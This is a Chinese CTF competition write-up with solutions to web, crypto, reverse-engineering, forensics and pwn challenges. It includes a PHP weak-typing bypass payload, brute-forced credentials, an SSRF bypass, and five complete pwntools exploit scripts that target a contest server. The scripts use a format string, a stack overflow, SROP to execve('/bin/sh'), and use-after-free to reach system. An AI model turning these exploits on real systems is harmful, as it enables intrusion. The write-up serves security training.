Web
easyweb
代码审计弱类型和函数的特性
<?php
show_source(__FILE__);
$v1=0;$v2=0;$v3=0;
$a=(array)json_decode(@$_GET['foo']);//json编码
if(is_array($a)){
is_numeric(@$a["bar1"])?die("nope"):NULL;//判断是纯数字或数字字符串
if(@$a["bar1"]){
($a["bar1"]>2021)?$v1=1:NULL;//php弱类型绕过
}
if(is_array(@$a["bar2"])){
//需要count($a["bar2"])==5和is_array($a["bar2"][0])有值,是or
if(count($a["bar2"])!==5 OR !is_array($a["bar2"][0])) die("nope");
$pos = array_search("nudt", $a["a2"]);
//要求有a2,并且值中有字符串“nudt”
$pos===false?die("nope"):NULL;
foreach($a["bar2"] as $key=>$val){//循环
//bar2中不能有字符nudt
$val==="nudt"?die("nope"):NULL;
}
$v2=1;//需要
}
}
$c=@$_GET['cat'];
$d=@$_GET['dog'];
if(@$c[1]){
if(!strcmp($c[1],$d) && $c[1]!==$d){
//需要同时成立,即$c$d既相等又不相等,通过php弱类型绕过数组和字符串比较返回null
eregi("3|1|c",$d.$c[0])?die("nope"):NULL;//eregi函数有个%00截断漏洞
strpos(($c[0].$d), "cstc2021")?$v3=1:NULL;
//$c[0]和$d连接返回字符串cstc2021的位置
}
}
if($v1 && $v2 && $v3){
include "flag.php";
echo $flag;
}
?>
poc:?foo={"bar1":"2022a","bar2":[[1],2,3,4,5],"a2":"nudt"}&cat[1][]=111&cat[0]=12cstc2021&dog=%00
easyweb2
最开始通过扫描得到了路径swagger-ui.html
然后就经历特别多的测试,最后给了提醒使用token,而token是通过登录来获得的,这里就通过暴力破解了。成功暴力破解出test/test。
在看提示说需要获得管理员的token。然后发现有一个user-controller,那可能是暴力破解出admin用户
成功暴力破解
{"用户ID":"987","用户组":"系统管理员","用户名":"ctf_admin","HASH":"2773d5bd7e1a7a7eec619c6d5fbdfd3a"}
2773d5bd7e1a7a7eec619c6d5fbdfd3a解出为ctfer123!@#
所以ctf_admin/ctfer123!@#,重新登录。
获得管理员Token:9c618e664319512ef7db2d3c0672bee0
然后提示关注/home/index接口,猜一猜肯定是ssrf啦。这里经过fuzz出过滤了file,所以通过双写绕过。
成功获得flag
Crypto
RSA2
由于padding的范围很小,通过小公钥指数攻击估算出e,由于范围很小,e可以视为已知
e_small = gmpy2.iroot(c1,3)[0]
e_big = gmpy2.iroot(c2,3)[0]
if e_small > e_big:
e_small, e_big = e_big, e_small
start = 20210401
end = 20210505
e_min = e_big - start
e_max = e_small - end
'''
e_min = 53860
e_max = 53957
'''`
因为g = d * (p - 0xdeadbeef)
,且e已知,同乘e即使在mod n的条件下消去d
又因0xdeadbeef
为常数,可以通过构造消去,可以构造出K*p的结构,并对其求公因式则可分解n,并可以同时确定e
for e in range(e_min,e_max):
kp = pow(2 ,e*g , n) * pow(2 ,0xdeadbeef-1 ,n)
p =gmpy2.gcd(kp-1 ,n)
if p != 1:
break
已知e,n,p则可以分解出q,从而求出d,之后则可以通过常规的rsa解密
EXP
from gmpy2 import *
from Crypto.Util.number import *
c1 = 8321449807360182827125
c2 = 8321441183828895770712
n = 378094963578091245652286477316863605753157432437621367359342302751615833557269627727449548734187939542588641672789504086476494927855747407344197241746889123693358997028141479289459947165818881146467218957546778123656120190207960702225556466771501844979094137868818924556860636212754616730115341674681116573326890134855072314950288530400350483394140781434097516134282100603979066057391672872913866678519235744668652042193736205044674422210689619562242862928626697711582401250962536787125165979017740138070213899305175933585261127763164192929103624167063213758551239415744211455417108907505646457646161227272639379721764779734013149963229002406400371319674194009206372087547010201440035410745572669645666856126204769178179570446069571090298945041726576151255620825221663591127702492882834949100599423704250729752444923956601971323645242934249137015933524911614158989705977723056398299344849153945858516695027157652464450872079484515561281333287781393423326046633891002695625031041881639987758851943448352789469117137668229144914356042850963002345804817204906458653402636643504354041188784842235312540435896510716835069861282548640947135457702591305281493685478066735573429735004662804458309301038827671971059369532684924420835204769329
g = 3976547671387654068675440379770742582328834393823569801056509684207489138919660098684138301408123275651176128285451251938825197867737108706539707501679646427880324173378500002196229085818500327236191128852790859809972892359594650456622821702698053681562517351687421071768373342718445683696079821352735985061279190431410150014034774435138495065087054406766658209697164984912425266716387767166412306023197815823087447774319129788618337421037953552890681638088740575829299105645000980901907848598340665332867294326355124359170946663422578346790893243897779634601920449118724146276125684875494241084873834549503559924080309955659918449396969802766847582242135030406950869122744680405429119205293151092844435803672994194588162737131647334232277272771695918147050954119645545176326227537103852173796780765477933255356289576972974996730437181113962492499106193235475897508453603552823280093173699555893404241432851568898226906720101475266786896663598359735416188575524152248588559911540400610167514239540278528808115749562521853241361159303154308894067690191594265980946451318139963637364985269694659506244498804178767180096195422200695406893459502635969551760301437934119795228790311950304181431019690890246807406970364909654718663130558117158600409638504924084063884521237159579000899800018999156006858972064226744522780397292283123020800063335841101274936236800443981678756303192088585798740821587192495178437647789497048969720110685325336457005611803025549386897596768084757320114036370728368369612925685987251541629902437275412553261624335378768669846356507330025425467339014984330079364067149950238561943275006049728406278318846998650496707162387768801213108565185221147664770009978012050906904959264045050100404522270495606970447076283894255951481388496134870426452215997834228869196114684962261076716651779120620585343304887755029463545328534291186
c = 141187369139586875794438918220657717715220514870544959295835385681523005285553297337947377472083695018833866941104904071675141602626896418932763833978914936423338696805941972488176008847789235165341165167654579559935632669335588215515509707868555632337151209369075754122977694992335834572329418404770856890386340258794368538033844221701815983303376617825048502634692029763947325144731383655217790212434365368739783525966468588173561230342889184462164098771136271291295174064537653917046323835004970992374805340892669139388917208009182786199774133598205168195885718505403022275261429544555286425243213919087106932459624050446925210285141483089853704834315135915923470941314933036149878195756750758161431829674946050069638069700613936541544516511266279533010629117951235494721973976401310026127084399382106355953644368692719167176012496105821942524500275322021731162064919865280000886892952885748100715392787168640391976020424335319116533245350149925458377753639177017915963618589194611242664515022778592976869804635758366938391575005644074599825755031037848000173683679420705548152688851776996799956341789624084512659036333082710714002440815131471901414887867092993548663607084902155933268195361345930120701566170679316074426182579947
start = 20210401
end = 20210505
e_small = iroot(c1,3)[0]
e_big = iroot(c2,3)[0]
if e_small > e_big:
e_small, e_big = e_big, e_small
assert e_small < e_big
e_min = e_big - end
e_max = e_small - start
'''
e_min = 53860
e_max = 53957
'''
for e in range(e_min,e_max):
kp = pow(2 ,e*g , n) * pow(2 ,0xdeadbeef-1 ,n)
p = gcd(kp-1 ,n)
if p != 1:
break
q = n // p
print(long_to_bytes(pow(c,invert(e,(q-1) * (p-1)),n)))
Re
free_flag
首先反编译,可以知道关心的应该是Pin的值
找到对Pin进行了引用的地方,异或
找到byte_B98数组的值,异或一下12
#include <stdio.h>
unsigned char ida_chars[] =
{
120, 100, 63, 83, 109, 121, 120, 100, 98, 63,
120, 61, 111, 56, 61, 120, 60, 98, 83, 57,
117, 57, 120, 63, 97, 83, 61, 57, 83, 98,
60, 120, 83, 60, 57, 83, 57, 63, 111, 121,
126, 63, 10
};
int main()
{
int i;
for(i = 0; i < sizeof(ida_chars); i++)
putchar(ida_chars[i]^0xc);
}
crackme
逆向菜鸡做这个绕了个大圈。。。
胡乱找了很久,找到关键代码,然后慢慢看了很久的算法。。
开始是一个长度判断
然后算法,看了很久,感觉复杂啊
上面折磨了很久,然后就去看了看第二部分计算,艹,马上就没做计算,直接比较,那我之前看的第一部算法,不用管啊。。。。
最后,我单步调试一个一个得到计算完的值,再md5,完事
ck
感觉,这个题碰运气,哈哈哈
ida反编译后直接搜索字符串
第一个字符串就很可疑,
然后直接x,找字符串引用,发现新天地
这不是base64加密嘛,从 = 也可以猜想
所以这就是一个换表base64嘛
简单:
import base64
s = ",.0fgWV#`/1Heox$~\"2dity%_;j3csz^+@{4bKrA&=}5laqB*-[69mpC()]78ndu"
print(len(s))
table = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
enc = 'ef"^sVK@3r@Ke4e6%6`)'
ans = enc.translate(str.maketrans(s, table))
print(base64.b64decode(ans))
得到:04_tianhe233_29。
md5,得到flag
maze
迷宫题
没有什么坑,还给了游戏熟悉的aswd,贴心
让程序跑起来,然后提取出数据,C语言中打印成7*7规模,最后手走一下即可,当然要写搜索算法来跑感觉也行,锻炼一下 hahhah,赛后尝试一下
#include <stdio.h>
unsigned int data[49] = {
0x00000001, 0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001,
0x00000000, 0x00000001, 0x00000001, 0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000001,
0x00000001, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000000, 0x00000000, 0x00000000,
0x00000001, 0x00000001, 0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000001,
0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000001,
0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000000,
0x00000001
};
int main(void)
{
int i, j;
for(i = 0; i < 7; i++)
{
for(j = 0; j < 7; j++)
{
printf("%d ", data[7*i+j]);
}
putchar(10);
}
}
终点就是最后一个点!
ssddwdwdddssaasasaaassddddwdds
再md5一下得到flag。
Misc
RGB
找到了类似的题https://www.cnblogs.com/webFuckeeeer/p/4536776.html
顺着来就可以做出来
通过图片size分解了一下:176和164比较合适
#-*- coding:utf-8 -*-
from PIL import Image
import re
x = 503 #x坐标 通过对txt里的行数进行整数分解
y = 122 #y坐标 x*y = 行数
im = Image.new("RGB",(x,y))#创建图片
file = open('misc100.txt') #打开rbg值文件
#通过一个个rgb点生成图片
for i in range(0,x):
for j in range(0,y):
line = file.readline()#获取一行
rgb = line.split(",")#分离rgb
im.putpixel((i,j),(int(rgb[0]),int(rgb[1]),int(rgb[2])))#rgb转化为像素
im.show()
zip
有个加密的压缩包,没有任何提示.一点点爆破出来的密码是ff123
出来一个加密的docx文件,无法爆破.
还有一个readme.txt文档,里面好像是培根密码
解密docx,直接strings命令发现flag
memory1
vmem搜了一下常用volatility进行取证
由于我kali是2020版,就只能在powershell里操作了
先确定imageinfo
再用pstree找相关的进程
找到一个后门metsvc.exe,看是谁调用的:
cmdline参数:
metsvc.exe pid: 1908 ************************************************************************ metsvc.exe pid: 400 Command line : "C:\Windows\TEMP\cybSAbYRflAvhz\metsvc.exe" service ************************************************************************ metsvc-server. pid: 1912 ************************************************************************ cscript.exe pid: 1472 Command line : cscript "C:\Windows\TEMP\UEAOGWBdwyydm.vbs"
这个vbs就很像了,试了一下确实正确
Pwn
bank
密码为随机值,若密码第一个字节为'\x00'时,若我们输入为'\x00',则两个相等,所以输入'\x00',成功几率为1 /256,在通过格式化字符串漏洞将堆中的flag打印出来即可。
exp
#!/usr/bin/env python
#-*- coding:utf-8 -*-
from pwn import *
import os
r = lambda x : io.recv(x)
ra = lambda : io.recvall()
rl = lambda : io.recvline(keepends = True)
ru = lambda x : io.recvuntil(x, drop = True)
s = lambda x : io.send(x)
sl = lambda x : io.sendline(x)
sa = lambda x, y : io.sendafter(x, y)
sla = lambda x, y : io.sendlineafter(x, y)
ia = lambda : io.interactive()
c = lambda : io.close()
li = lambda x : log.info('\x1b[01;38;5;214m' + x + '\x1b[0m')
context.log_level='debug'
context.terminal = ['tmux', 'splitw', '-h']
#context.arch = 'amd64'
elf_path = 'bank'
libc_path = '/glibc/2.23/64/lib/libc.so.6'
libc_path = './libc.so.6'
# remote server ip and port
host = "81.70.195.166:10000"
# if local debug
LOCAL = 0
LIBC = 0
#--------------------------func-----------------------------
def db():
if(LOCAL):
gdb.attach(io)
#--------------------------exploit--------------------------
def exploit():
li('exploit...')
p = 'A'
sla(':', p)
sl('\x00')
ru('?')
sl('yes')
#db()
sl('%8$s')
def finish():
ia()
c()
#--------------------------main-----------------------------
if __name__ == '__main__':
for i in range(255):
try:
if LOCAL:
elf = ELF(elf_path)
if LIBC:
libc = ELF(libc_path)
io = elf.process()
else:
elf = ELF(elf_path)
io = remote(host.split(':')[0], int(host.split(':')[1]))
if LIBC:
libc = ELF(libc_path)
exploit()
finish()
except:
continue
auto
先采用angr来 fuzz找到进入login_again函数的输入
angr脚本如下:
import angr
from binascii import b2a_hex
import logging
import sys
logging.getLogger('angr').setLevel('INFO')
#logging.getLogger('angr').setLevel('CRITICAL')
def angr_main():
pj = angr.Project('./auto')
state = pj.factory.entry_state()
simgr = pj.factory.simgr(state)
simgr.explore(find = 0x0804867E) # call login_again
p = simgr.found[0].posix.dumps(0)
print(b2a_hex(p).decode(), end='')
angr_main()
login_again就是个堆栈溢出了,留有后面,直接跳到后门函数。
exp
#!/usr/bin/env python
#-*- coding:utf-8 -*-
from pwn import *
import os
r = lambda x : io.recv(x)
ra = lambda : io.recvall()
rl = lambda : io.recvline(keepends = True)
ru = lambda x : io.recvuntil(x, drop = True)
s = lambda x : io.send(x)
sl = lambda x : io.sendline(x)
sa = lambda x, y : io.sendafter(x, y)
sla = lambda x, y : io.sendlineafter(x, y)
ia = lambda : io.interactive()
c = lambda : io.close()
li = lambda x : log.info('\x1b[01;38;5;214m' + x + '\x1b[0m')
context.log_level='debug'
context.terminal = ['tmux', 'splitw', '-h']
#context.arch = 'amd64'
elf_path = 'auto'
libc_path = '/glibc/2.23/64/lib/libc.so.6'
libc_path = './libc.so.6'
# remote server ip and port
host = "81.70.195.166:10001"
# if local debug
LOCAL = 0
LIBC = 0
#--------------------------func-----------------------------
def db():
if(LOCAL):
gdb.attach(io)
#--------------------------exploit--------------------------
def exploit():
li('exploit...')
# 55 58 59 55 4b 56 4e 5a
p = '\x55\x58\x59\x55\x4b\x56\x4e\x5a'
s(p)
#db()
p = b'\x00' * 0x48
p += p32(0x0)
p += p32(0x08048665)
sl(p)
def finish():
ia()
c()
#--------------------------main-----------------------------
if __name__ == '__main__':
if LOCAL:
elf = ELF(elf_path)
if LIBC:
libc = ELF(libc_path)
io = elf.process()
else:
elf = ELF(elf_path)
io = remote(host.split(':')[0], int(host.split(':')[1]))
if LIBC:
libc = ELF(libc_path)
exploit()
finish()
small
采用srop进行构造出execve("/bin/sh", 0, 0)拿 shell
exp
#!/usr/bin/env python
#-*- coding:utf-8 -*-
from pwn import *
import os
r = lambda x : io.recv(x)
ra = lambda : io.recvall()
rl = lambda : io.recvline(keepends = True)
ru = lambda x : io.recvuntil(x, drop = True)
s = lambda x : io.send(x)
sl = lambda x : io.sendline(x)
sa = lambda x, y : io.sendafter(x, y)
sla = lambda x, y : io.sendlineafter(x, y)
ia = lambda : io.interactive()
c = lambda : io.close()
li = lambda x : log.info('\x1b[01;38;5;214m' + x + '\x1b[0m')
context.log_level='debug'
context.terminal = ['tmux', 'splitw', '-h']
context.arch = 'amd64'
elf_path = 'small'
libc_path = '/glibc/2.23/64/lib/libc.so.6'
libc_path = './libc.so.6'
# remote server ip and port
host = "81.70.195.166:10002"
# if local debug
LOCAL = 0
LIBC = 0
#--------------------------func-----------------------------
def db():
if(LOCAL):
gdb.attach(io)
#--------------------------exploit--------------------------
def exploit():
li('exploit...')
syscall_ret = 0x40100A
vul_addr = 0x40100D
bss = elf.bss() + 0x100
sigframe = SigreturnFrame()
sigframe.rax = constants.SYS_read
sigframe.rdi = 0
sigframe.rsi = bss
sigframe.rdx = 0x200
sigframe.rsp = bss + 0x18
sigframe.rip = syscall_ret
p = b'\x11' * 0x18 + p64(vul_addr) + p64(syscall_ret) + bytes(sigframe)
s(p)
# set rax=15 and call sigreturn
sleep(0.1)
p = b'\x00' * 15
s(p)
sigframe = SigreturnFrame()
sigframe.rax = constants.SYS_execve
sigframe.rdi = bss # "/bin/sh" 's addr
sigframe.rsi = 0x0
sigframe.rdx = 0x0
sigframe.rsp = bss + 0x18
sigframe.rip = syscall_ret
p = b'/bin/sh\x00' + b'\x00' * 0x10 + p64(vul_addr) + p64(syscall_ret) + bytes(sigframe)
sleep(0.1)
s(p)
# call sigreturn
p = b'\x00' * 15
#db()
sleep(0.1)
s(p)
def finish():
ia()
c()
#--------------------------main-----------------------------
if __name__ == '__main__':
if LOCAL:
elf = ELF(elf_path)
if LIBC:
libc = ELF(libc_path)
io = elf.process()
else:
elf = ELF(elf_path)
io = remote(host.split(':')[0], int(host.split(':')[1]))
if LIBC:
libc = ELF(libc_path)
exploit()
finish()
paper
uaf漏洞,开辟堆块到v8 - 8处,修改v9值为0xcccccccc拿shell。
exp
#!/usr/bin/env python
#-*- coding:utf-8 -*-
from pwn import *
import os
r = lambda x : io.recv(x)
ra = lambda : io.recvall()
rl = lambda : io.recvline(keepends = True)
ru = lambda x : io.recvuntil(x, drop = True)
s = lambda x : io.send(x)
sl = lambda x : io.sendline(x)
sa = lambda x, y : io.sendafter(x, y)
sla = lambda x, y : io.sendlineafter(x, y)
ia = lambda : io.interactive()
c = lambda : io.close()
li = lambda x : log.info('\x1b[01;38;5;214m' + x + '\x1b[0m')
context.log_level='debug'
context.terminal = ['tmux', 'splitw', '-h']
#context.arch = 'amd64'
elf_path = 'paper'
libc_path = '/glibc/2.23/64/lib/libc.so.6'
libc_path = './libc.so.6'
# remote server ip and port
host = "81.70.195.166:10003"
# if local debug
LOCAL = 0
LIBC = 0
#--------------------------func-----------------------------
def db():
if(LOCAL):
gdb.attach(io)
def ad():
sla('>', '1')
def rm(idx):
sla('>', '2')
sla(':', str(idx))
def wt(idx, n):
sla('>', '3')
sla(':', str(idx))
sla(':', str(n))
def fd():
sla('>', '4')
def mv(idx):
sla('>', '5')
sla('?', str(idx))
def sh():
sla('>', '6')
#--------------------------exploit--------------------------
def exploit():
li('exploit...')
ad()
rm(0)
fd()
ru('0x')
v8 = int(r(12), 16)
li('v8: ' + hex(v8))
mv(0x21)
wt(0, v8 - 8)
ad() # 1
ad() # 2
wt(2, 0xCCCCCCCC)
sh()
#db()
def finish():
ia()
c()
#--------------------------main-----------------------------
if __name__ == '__main__':
if LOCAL:
elf = ELF(elf_path)
if LIBC:
libc = ELF(libc_path)
io = elf.process()
else:
elf = ELF(elf_path)
io = remote(host.split(':')[0], int(host.split(':')[1]))
if LIBC:
libc = ELF(libc_path)
exploit()
finish()
managebooks
漏洞为uaf,在打印Summary函数中,采用函数指针调用,修改该函数指针,即可劫持rip,先泄漏libc,再调用system即可。
exp
#!/usr/bin/env python
#-*- coding:utf-8 -*-
from pwn import *
import os
r = lambda x : io.recv(x)
ra = lambda : io.recvall()
rl = lambda : io.recvline(keepends = True)
ru = lambda x : io.recvuntil(x, drop = True)
s = lambda x : io.send(x)
sl = lambda x : io.sendline(x)
sa = lambda x, y : io.sendafter(x, y)
sla = lambda x, y : io.sendlineafter(x, y)
ia = lambda : io.interactive()
c = lambda : io.close()
li = lambda x : log.info('\x1b[01;38;5;214m' + x + '\x1b[0m')
context.log_level='debug'
context.terminal = ['tmux', 'splitw', '-h']
#context.arch = 'amd64'
elf_path = 'managebooks'
libc_path = '/glibc/2.27/64/lib/libc.so.6'
# remote server ip and port
host = "81.70.195.166:10004"
# if local debug
LOCAL = 0
LIBC = 1
#--------------------------func-----------------------------
def db():
if(LOCAL):
gdb.attach(io)
def ad(name_sz, name, data_sz, data):
sla('>>', '1')
sla(':', str(name_sz))
sa(':', name)
sla(':', str(data_sz))
sa(':', data)
def rm(idx):
sla('>>', '2')
sla(':', str(idx))
def ch(idx, sz, data):
sla('>>', '3')
sla(':', str(idx))
sla(':', str(sz))
sa(':', data)
def rd(idx):
sla('>>', '4')
sla(':', str(idx))
#--------------------------exploit--------------------------
def exploit():
bookcase = 0x6020C0
li('exploit...')
ad(0x10, 'AAAA', 0x500, 'bbbb')
rm(0)
rm(0)
ch(0, 0x80, '\x10') # free sum and alloc
ad(0x10, p64(elf.plt['puts']), 0x30, '/bin/sh\x00') # 1
'''
rm(0)
#ad(0x10, p64(bookcase), 0x20, 'bbbb')
'''
rd(0) # leak libc
leak = u64(ru('\x7f')[-5:] + b'\x7f\x00\x00')
libc_base = leak - libc.sym['__malloc_hook'] - 976 - 0x10
li('libc_base: ' + hex(libc_base))
rm(1)
rm(1)
ad(0x10, p64(libc_base + libc.sym['system']), 0x30, '\x00') # 1
#db()
rd(1) # call system
def finish():
ia()
c()
#--------------------------main-----------------------------
if __name__ == '__main__':
if LOCAL:
elf = ELF(elf_path)
if LIBC:
libc = ELF(libc_path)
io = elf.process()
else:
libc_path = './libc.so.6'
elf = ELF(elf_path)
io = remote(host.split(':')[0], int(host.split(':')[1]))
if LIBC:
libc = ELF(libc_path)
exploit()
finish()